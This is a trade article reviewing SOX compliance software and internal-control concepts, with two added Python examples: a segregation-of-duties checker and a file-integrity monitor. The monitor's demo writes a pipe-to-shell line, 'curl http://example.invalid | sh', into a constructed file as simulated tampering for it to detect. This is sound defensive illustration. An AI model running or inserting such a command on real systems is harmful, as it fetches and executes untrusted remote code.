SOX compliance: More than a single approach

The Sarbanes-Oxley Act was passed in 2002. Six years later, subject companies are still working to comply with its provisions. Add the fact that other countries are implementing similar financial regulations, some of which apply to U.S. companies operating there, and it is easy to see why SOX compliance is still a hot issue.

While everyone is still arguing about implementation issues and which companies should be subject to which provisions, the main effect of Sarbanes-Oxley is to move the ultimate responsibility for the accuracy of financial reports from the outside auditor to the company's management. "The accountant cooked the books!" is no longer an acceptable defense. The company has to have internal controls and procedures sufficient to detect whether the books are being cooked. Under Section 302, senior management (in practice the CEO and CFO) must personally certify the accuracy and fairness of the financial statements, regardless of what an external auditor reports.

Financial reporting standards, as well as GAAP and best practices, have always required internal controls. With SOX, it’s your clients’ responsibility to prove that those internal controls actually exist and work the way they are supposed to. That’s a documentation issue as well as a process and workflow issue, and is the crux of Section 404.

NOT ALL TO ALL

There isn’t any one SOX compliance application that addresses every issue of concern. Many companies will have to implement two or more tools to feel comfortable that they are complying with the essential issues that SOX addresses. Risk management is also a component of compliance. There’s no way that a company can be 100 percent certain that the procedures and internal controls are completely effective. And even if it were possible, this level of confidence would be so expensive that no company could afford it.

Many of the applications on the market address one or more of three major areas. Two of the three have to do with internal controls — access control and change control. The third is documentation.

Access control is where segregation of duties (SOD) is enforced. Not every employee should have the same level of access to features and procedures within a company, and in particular no single employee should be able to both initiate and approve a transaction, or both set up a payee and pay it. Access controls exist to enforce these SODs. The SOX compliance applications that address this area either test the existing controls to confirm that they actually work, or supplement the controls and procedures already in place. Equally important is change control. These applications record every transaction and configuration change, confirm that it was made by an employee authorized for that kind of change, and keep an audit trail and reports so that any improper change can be detected and addressed.

Finally, SOX outlines specific kinds of documentation needs that should be addressed. These range from management surveys, to records of discovery and resolution of internal control incidents.

Much of SOX touches IT functions, as IT is an integral part of financial transaction processing in any enterprise. Many of the SOX compliance applications we examined are built around the COSO framework. COSO (the Committee of Sponsoring Organizations of the Treadway Commission) published its Internal Control-Integrated Framework in 1992 with five components: control environment, risk assessment, control activities, information and communication, and monitoring. Its 2004 Enterprise Risk Management framework expanded these to eight: internal environment, objective setting, event identification, risk assessment, risk response, control activities, information and communication, and monitoring. A separate framework for IT governance, COBIT (Control Objectives for Information and related Technology), published by ISACA and the IT Governance Institute, is designed to be consistent with COSO and is the one most often used to map IT controls onto COSO objectives.

FREE IS GOOD TOO

For the most part, compliance software is expensive. While vendors are reluctant to quote prices due to the unknowns in installing and configuring a product, most of the applications detailed in this roundup can cost from $50,000 to upwards of several hundred thousand dollars before the application is up and running.

Not all compliance aids have to be this brutally expensive. While many tend to dismiss free utilities as being worth exactly what they cost, there are a couple of “freebies” that you might want to investigate.

For example, Microsoft offers a useful implementation template for MS Project in the section for Office downloads. This template, available at http://office.microsoft.com/en-us/templates, is a nice guide for performing internal control audits, as well as evaluating potential options for implementing Section 404 compliance.

Another useful free tool is the Application Discovery Tool from Sophos Inc. (online at www.sophos.com/products/, under “Free Tools”). Using this tool, which requires that the network server be using Active Directory, you and your clients can discover what applications, both authorized and unauthorized, exist on a network.

Strangely enough, this is one area that often gets overlooked in ramping up SOX compliance. If you were to travel to a client site, how many personal downloads such as MP3s, games and the like do you think you would find on some of the networked PCs? What do you think that says about your clients’ internal controls?

Regardless of how you go about it, the tools that you pick will vary from client to client, and often even from one location to another for the same client. There is no one universal SOX compliance application. To meet the requirements laid out in the different sections of Sarbanes-Oxley, and, increasingly, to meet other regulatory compliance requirements, you will have to help your clients choose the right fit of applications that provide them with assurance that they are adequately managing their risk, while still being affordable and flexible enough to be effectively employed.

To give you an idea of what is available to address your clients’ compliance needs, we looked at eight of the many applications available. All of these need to be installed by a reseller or VAR, and costs are quoted after determining how the implementation would take place.

AXENTIS FINANCIAL GRC SUITE

Axentis applications are built on the foundation of the vendor’s Axentis Enterprise platform, which is a Web-based Software-as-a-Service compliance engine. The Financial GRC Suite is one of a number of extensions to this platform that address different compliance areas and regulations. In addition to the Financial GRC Suite, the Enterprise platform supports the Legal & Regulatory Suite, the Ethics & Integrity Suite, the Information Privacy Suite, IT GRC and the ERM Suite. Your client may well benefit from some (or all) other additional suites to address compliance issues beyond SOX.

In the past, Axentis’ offering was named the Sarbanes-Oxley Management Suite. The new name reflects the fact that compliance issues are increasingly expanding with international reporting and compliance requirements such as J-SOX, K-SOX and EU SOS.

The Financial GRC Suite provides base services, including organization management, knowledge management and communication management, as well as reporting and analytics, and audit trail tracking. To these base services, the application adds risk and control management, which directly addresses Section 404 concerns. Management surveys are provided, as is online SOX training, which can greatly ease the pain of introducing new employees (or promoted employees) to what is required of them to meet regulatory requirements.

Other compliance areas covered by the Financial GRC Suite include incident management and document management capabilities that address Section 302 requirements. Axentis Financial GRC Suite, like the other suites built on the Enterprise foundation, is Web-based and not tied to any specific ERP or accounting application.

FRONTRANGE ITSM

FrontRange Solutions is best known for its CRM product, GoldMine. The company also has very strong enterprise-level offerings in a number of other areas, including help desk management, and the ITSM (IT Service Management) application detailed here.

As with a number of other products included here, ITSM is not primarily targeted at SOX compliance. Rather, it is a more general IT compliance application that is appropriately used as a tool in your clients’ SOX compliance efforts.

ITSM addresses the IT side of SOX compliance by building on IT frameworks whose goals overlap those of SOX and COBIT. It is designed around the Information Technology Infrastructure Library (ITIL), a set of procedures and best practices originally developed by the British government. ITSM includes nine ITIL modules, each available separately: Incident Management, Problem Management, Change Management, Release Management, Service Level Management, Configuration Management, Availability Management, Knowledge Management, and Self Service. Not all of these modules bear directly on SOX compliance, though even those that do not are worthwhile in many enterprises. All of the modules require a database server for data collection: Oracle 9i, Microsoft SQL Server 2000 SP3 or SQL Server 2005.

ITSM’s Incident Management, Problem Management and Change Management will most likely be the more applicable modules to assist with SOX compliance, though you can install each of them individually to cover holes left by other compliance packages.

As with pretty much all of the other packages in this roundup, FrontRange is reluctant to quote prices, as the end cost can vary greatly depending on which modules are installed and the ease or difficulty of integrating with existing applications. ITSM is sold and installed by resellers and VARs, as are almost all applications for SOX compliance.

OPENPAGES FCM

OpenPages has several packages that can be used to address Sarbanes-Oxley concerns. OpenPages Audit is an application that directly targets internal audit. It can provide risk assessment that will be useful in planning an audit of internal controls, as well as managing the audit itself, and keeping track of time, tasks and workpapers. OpenPages Audit integrates with most IT environments, and provides reports that can be used to meet the documentation requirements of Section 302.

OpenPages ITG (Information Technology Governance) provides a single repository for all compliance and risk documentation. It also allows the state of IT governance to be displayed in easy-to-understand dashboards. OpenPages ITG is compatible with most compliance frameworks, including COSO, COBIT, ITIL and ISO. Both of these applications can be used to address other compliance and regulatory requirements in addition to SOX.

The application most applicable to SOX and similar compliance requirements in other countries is OpenPages FCM (Financial Controls Management). OpenPages FCM has some capabilities found in other OpenPages applications, including the underlying central data repository, comprehensive audit trail, and dashboard displays of status and drill-down reports. FCM adds management surveys and workflow routing, which help meet Sections 302 and 404 requirements.

OpenPages is an enterprise-level application, and will integrate well with most financial accounting systems.

SAP SOLUTIONS FOR GRC

SAP Solutions for GRC (Governance, Risk and Compliance) are a highly integrated set of six modules — SAP GRC Risk Management; SAP GRC Access Control; SAP GRC Process Control; SAP GRC Global Trade Services; environment, health and safety compliance management applications; and GRC composite applications by SAP and Cisco. Of these modules, Risk Management, Access Control and Process Control would probably be of the most interest in providing SOX compliance — though if your client has a widely extended enterprise, the composite applications by SAP and Cisco can help extend and evaluate internal controls.

The module names are pretty descriptive of what each accomplishes. Access Control helps to identify and control access risks at all levels in the enterprise, while Risk Management helps detect and evaluate risks in financial, legal and operational areas. Finally, Process Control helps to monitor and enforce key controls affecting processes and workflows all throughout the enterprise.

All of the SAP Solutions for GRC are designed to work with SAP's own ERP applications.

SECURITY WEAVER

Developed as an application for users of SAP’s Web Application Server, Security Weaver is a set of five integrated modules that provide enhanced security, as well as access authorizations and tracking capability that are essential for maintaining and documenting internal controls that meet SOX requirements.

These modules consist of: Separations Enforcer, Emergency Repair, Secure Provisioning, Secure Audit and Secure Enterprise. The Separations Enforcer addresses the requirement for separation of duties in SAP. Segmenting and monitoring who in an organization has access to what areas is a fundamental consideration in internal controls. This is accomplished by creating an SOD matrix (a table of functions that must not be held by the same person), monitoring who actually holds what access in SAP, recording the SOD conflicts found, and then either adjusting the SOD matrix or following through with more effective controls, such as removing the conflicting access or documenting a compensating control. The Secure Enterprise module extends this SOD monitoring capability throughout the enterprise.

The Emergency Repair module is useful when access to SAP administrative areas is required after business hours. Employees can be pre-authorized for emergency access, and any repairs or other modifications made under it are logged against that employee's own ID, with e-mail notification to the appropriate supervisors whenever emergency repair or access is invoked. That log of what was done under emergency access, and who reviewed it, is what an auditor will ask for.

Access control is also addressed by the Secure Provisioning module. This allows an IT administrator to set up a policy matrix that automatically grants privileges and enforces restrictions for new, re-assigned and terminated employees. Conflicts with existing SOD are reported so that they can be immediately resolved.
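The SOD matrix and provisioning-time conflict check described above (and the segregation-of-duties point made earlier in the article) reduce to a small piece of logic: a set of toxic capability pairs, a map from roles to capabilities, and a test of whether a user's combined roles cover any pair. The following is an added example written for this page, not Security Weaver's or SAP's code. The role names, capabilities, rule descriptions and user assignments are constructed for illustration and are not real SAP roles or transaction codes.

```python
"""Segregation-of-duties (SoD) conflict check over user-role assignments.

Added example, not code from Security Weaver or any vendor in the article.
All role names, capabilities and users below are constructed for illustration.
"""

# Constructed SoD matrix: each entry is a pair of capabilities that one
# person must never hold together, with the fraud scenario it prevents.
SOD_MATRIX = {
    frozenset({"create_vendor", "approve_payment"}): "vendor fraud: create and pay a vendor",
    frozenset({"post_journal", "approve_journal"}): "self-approval of journal entries",
    frozenset({"change_bank_details", "approve_payment"}): "redirect payments to own account",
    frozenset({"grant_access", "approve_payment"}): "grant self payment rights",
}

# Constructed role -> capability mapping (hypothetical role names).
ROLES = {
    "AP_CLERK": {"create_vendor", "post_journal"},
    "AP_MANAGER": {"approve_payment", "approve_journal"},
    "TREASURY": {"change_bank_details"},
    "IT_ADMIN": {"grant_access"},
}


def capabilities_for(roles, role_map=ROLES):
    """Union of the capabilities granted by a set of roles."""
    caps = set()
    for role in roles:
        caps |= role_map.get(role, set())
    return caps


def sod_conflicts(roles, role_map=ROLES, matrix=SOD_MATRIX):
    """Return a sorted list of (capability pair, description) violated by `roles`.

    A conflict exists when every capability in a matrix row is held, no
    matter which role contributed it: two individually clean roles can
    combine into a toxic one, which is why checking roles in isolation is
    not enough.
    """
    caps = capabilities_for(roles, role_map)
    hits = []
    for pair, why in matrix.items():
        if pair <= caps:
            hits.append((tuple(sorted(pair)), why))
    return sorted(hits)


def check_assignment(users, role_map=ROLES, matrix=SOD_MATRIX):
    """Check every user; returns {user: [conflicts]} for users with any conflict."""
    report = {}
    for user, roles in users.items():
        hits = sod_conflicts(roles, role_map, matrix)
        if hits:
            report[user] = hits
    return report


def safe_to_add(current_roles, new_role, role_map=ROLES, matrix=SOD_MATRIX):
    """Provisioning-time check: would granting `new_role` create a new conflict?

    Returns (ok, new_conflicts). Existing conflicts are not counted again,
    so a request is only refused for conflicts it would introduce.
    """
    before = set(sod_conflicts(current_roles, role_map, matrix))
    after = set(sod_conflicts(set(current_roles) | {new_role}, role_map, matrix))
    return after <= before, sorted(after - before)


# Constructed user assignments for the demonstration.
USERS = {
    "alice": {"AP_CLERK"},
    "bob": {"AP_MANAGER"},
    "carol": {"AP_CLERK", "AP_MANAGER"},   # promoted without dropping the old role
    "dave": {"TREASURY", "AP_MANAGER"},
}

if __name__ == "__main__":
    for user, hits in check_assignment(USERS).items():
        for pair, why in hits:
            print(f"{user}: {pair[0]} + {pair[1]} -> {why}")
    ok, new = safe_to_add(USERS["alice"], "AP_MANAGER")
    print("alice -> AP_MANAGER allowed:", ok, new)
```

The case of carol is the one that catches real organizations: each of her roles is clean on its own, and the conflict only appears when the old role is not removed on promotion. Running the same check at provisioning time, as `safe_to_add` does, is what turns the matrix from an after-the-fact report into a preventive control.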

Finally, the Secure Audit capabilities provide continuous monitoring of end-user transaction activity. This allows an organization to establish transaction-level internal controls and tracking, both of which will prove useful in performing the internal controls audit required by Sarbanes-Oxley.

EPROCESSMANAGER AND EPM3SOX

The applications detailed here take a variety of approaches to SOX compliance. Transition/1's ePM3SOx is process-based and COSO-compliant. It is an extension of the eProcessManager Suite, which helps you identify the business units, process cycles, key processes and functional areas in the client's business, using the COSO and COBIT templates included with the application to define them.

The underlying model of the software is that all business operations are inherently process-based. EPM3SOx provides a methodology for evaluating that existing financial and disclosure systems are functioning as needed, and if not, to determine what changes are necessary for them to be in compliance with business goals and regulatory requirements.

This is done by assessing the inherent risks of each “process” and identifying its impact on financial reporting, operational effectiveness, regulatory compliance, and corporate goals and strategies. During this implementation, eProcessManager generates documentation such as narratives, flow charts and risk matrixes, all of which help meet Sarbanes-Oxley Section 302 requirements.

Once that is accomplished, the eProcessMonitor utility is used to provide ongoing real-time feedback to managers responsible for the process and the internal auditor and management responsible for remediation. This part of the application provides control test plan management and generates various required sign-offs.

One large benefit that eProcessManager and ePM3SOx offer is that it is independent of the underlying accounting application. This gives ePM3SOx the ability to work with many mid-market accounting systems, rather than only enterprise-level financial accounting applications.

TRINTECH UNITY FINANCIAL GOVERNANCE SUITE

One side effect of having a successful product is that other companies often look to acquire either the product, or the entire company. That’s exactly what happened to Movaris, recently acquired by Trintech. The Unity Financial Governance Suite continues to remain available.

Unity is actually a set of four applications that can be purchased and implemented individually or as an integrated suite. These four applications are Enterprise Risk Management, Compliance, Financial Close and Reporting, and Account Reconciliation. Of these four, Compliance and Close are of primary interest to those looking for SOX software.

For the most part, Unity Compliance addresses SOX Section 302 documentation requirements. The application has a number of modules, including a Control Status Console, which displays the status of individual control tests, summary controls status, and documentation status. A second module, the Control Exception Console, highlights high-risk controls and provides interactive reports concerning remediation and exceptions.

The third module, a Multi-Dimensional Scoping Manager, evaluates controls to establish whether they are in-scope (requiring testing) or out-of-scope (do not require testing). This determination is made based on rules established by management and helps management determine which controls have or do not have a material effect on financial statements.

A second component of the Unity platform is Unity Financial Close, formerly named OneClose. This is a “last mile” application that analyzes and controls the manual processes performed during the closing process to ensure that nothing unauthorized slips into the financials at the last minute. It does this by analyzing where the adjusting entries are coming from, and subjecting them to a risk analysis, displaying the results on a dashboard.

TRIPWIRE ENTERPRISE

Rather than trying to be all things to all users in the SOX compliance market, Tripwire concentrates on using the COSO/COBIT framework to establish internal controls on the IT function outside of those controls that exist in the applications and operating system.

Available in Enterprise and Server editions, Tripwire takes a baseline of the monitored files, whether application binaries, data files or operating system configuration, and then continuously compares the current state against that baseline, recording every change it finds. Changes that fall outside the change rules the administrator has established are flagged and the appropriate person is alerted. Note that this is a detective control rather than a preventive one: Tripwire reports that an unauthorized change has happened; it does not stop it from happening. Its value therefore depends on how quickly alerts are acted on and on keeping the baseline itself out of reach of anyone who could alter the monitored systems.

This monitoring is continuous and comprehensive, with various dashboards and reports available to keep management alerted to any unauthorized or suspicious changes.
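To make the baseline-and-compare approach concrete, here is an added example, written for this page and not taken from Tripwire, of the core of a file-integrity monitor: snapshot every file's content hash and permission bits, then classify what differs between two snapshots. The directory tree, file names and "tampering" steps are all constructed inside a temporary directory so the script runs offline.

```python
"""Minimal file-integrity monitor in the Tripwire style: baseline, then diff.

Added example; not Tripwire's code. The monitored tree and the changes made
to it are constructed in a temporary directory purely for demonstration.
"""
import hashlib
import os
import stat
import tempfile


def _fingerprint(path):
    """Content hash plus the metadata an attacker may change without touching content."""
    st = os.lstat(path)
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return {
        "sha256": h.hexdigest(),
        "mode": stat.S_IMODE(st.st_mode),  # permission bits only
        "size": st.st_size,
    }


def baseline(root):
    """Snapshot every regular file under root: relative path -> fingerprint."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            # Skip symlinks: hashing the target would hide a retargeted link.
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snap[rel] = _fingerprint(full)
    return snap


def diff(old, new):
    """Classify changes between two snapshots into added, removed and modified."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    modified = []
    for rel in sorted(set(old) & set(new)):
        if old[rel] != new[rel]:
            # Name the attributes that changed so an analyst can triage quickly.
            what = [k for k in old[rel] if old[rel][k] != new[rel][k]]
            modified.append((rel, what))
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Build a constructed tree, baseline it, tamper with it, and return the diff."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, "bin", "ledger"), "wb") as f:
            f.write(b"#!/bin/sh\necho posting\n")
        conf = os.path.join(root, "etc", "ledger.conf")
        with open(conf, "w") as f:
            f.write("approvals=2\n")
        os.chmod(conf, 0o444)  # config is read-only at baseline time
        with open(os.path.join(root, "etc", "old.conf"), "w") as f:
            f.write("unused\n")
        before = baseline(root)

        # Constructed tampering: append to the binary, loosen the config's
        # permissions without touching its content, delete a file, add a file.
        with open(os.path.join(root, "bin", "ledger"), "ab") as f:
            f.write(b"curl http://example.invalid | sh\n")
        os.chmod(conf, 0o666)
        os.remove(os.path.join(root, "etc", "old.conf"))
        with open(os.path.join(root, "bin", "helper"), "w") as f:
            f.write("x\n")
        after = baseline(root)
        return diff(before, after)


if __name__ == "__main__":
    for kind, items in demo().items():
        print(kind, items)
```

The permission-only change to the config file is the case worth noticing: its content hash is unchanged, so a monitor that hashed content alone would miss it. In production the baseline must be stored where the monitored host cannot rewrite it (a separate server, or at least signed), since an attacker with administrative rights on the host will otherwise simply re-baseline after making changes.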

While the Server edition is fairly limited, and probably not the best choice for use in SOX compliance, the Enterprise edition of Tripwire has separate components to monitor applications, directory services, databases (Oracle 9 and 10g, Microsoft SQL Server 2000 and 2005), middleware, operating systems, virtual environments and network devices.

By itself, Tripwire is not a complete SOX or internal control solution. It does, however, go a long way towards addressing Section 404 concerns.

Ted Needleman, a former editor of Accounting Technology, is a consultant and freelance writer based in Stony Point, N.Y.

Vendor Information

Axentis Financial GRC Suite
Axentis Inc., Cleveland
(800) 955-2706
www.axentis.com

FrontRange ITSM
FrontRange Solutions Inc., Pleasanton, Calif.
(800) 776-7889
www.frontrange.com

OpenPages FCM
OpenPages, Waltham, Mass.
(781) 647-3800
www.openpages.com

SAP Solutions for GRC
SAP America Inc., Newtown Square, Pa.
(800) 872-1727
www.sap.com/grc

Security Weaver
Security Weaver, Carlsbad, Calif.
(800) 620-4210
www.securityweaver.com

eProcessManager and ePM3SOX
Transition/1 Management Accounting Systems Inc., Long Beach, Calif.
(866) 590-4376
www.eprocessmanager.com

Trintech Unity Financial Governance Suite
Trintech Inc., Addison, Texas
(800) 416-0075
www.trintech.com

Tripwire Enterprise
Tripwire Inc., Portland, Ore.
(800) 874-7947
www.tripwire.com

MORE FROM ACCOUNTING TODAY